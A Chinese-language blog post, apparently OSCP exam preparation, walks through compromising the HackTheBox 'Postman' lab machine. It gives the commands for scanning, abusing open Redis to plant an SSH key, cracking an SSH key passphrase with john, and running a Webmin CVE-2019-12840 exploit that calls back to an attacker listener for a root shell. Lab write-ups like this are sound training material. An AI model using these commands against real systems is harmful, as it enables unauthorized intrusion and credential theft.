OSCP备考_0x22_HackThBox靶机_Linux_postman

Ethan医生2个月前靶场85

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.20.206 (扫描UDP)


image.png


http://10.129.20.206/#first-section


image.png



https://10.129.20.206:10000/

image.png

没有可直接地用的地方那就试试看直接登入6379,

redis-cli -h 10.129.20.206

image.png

通过上面图片我们发现我们具有写入的权限


先在本地的kali上创建密钥

ssh-keygen

image.png



使用之前的私钥进行连接

ssh -i yes redis@10.129.20.206

直接拿到SHELL

image.png


手动枚举并没有什么有用的信息

所以上传linpeas进行枚举

image.png

image.png

有个密钥可以使用ssh2john进行转换 里面有具体操作过程,可以获取到一个密码computer2008

ssh2john id_rsa > hash_key

john hash_key --wordlist=/usr/share/wordlists/rockyou.txt

image.png

computer2008

image.png

search cve-2019-12840

use 0

set RHOSTS 10.10.10.160

set PASSWORD computer2008

set USERNAME Matt

set SSL True

run

提权到ROOT权限

使用10000端口上的webmin

python 50809.py -t https://10.129.20.206:10000 -c Matt:computer2008 -LS 10.10.16.31:8001 -L 10.10.16.31 -P 3333

image.png

标签: OSCP

相关文章

OSCP备考_0x45_HackThBox靶机_Windows_ bounty

OSCP备考_0x45_HackThBox靶机_Windows_ bounty

OSCP备考_0x45_HackThBox靶机_Windows_ bountynmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.246.227&nb...

OSCP备考_0x28_HackThBox靶机_Linux_blunder

OSCP备考_0x28_HackThBox靶机_Linux_blunder

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)http都没有查看到可以利用的点这边直接是看看orcal的漏...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。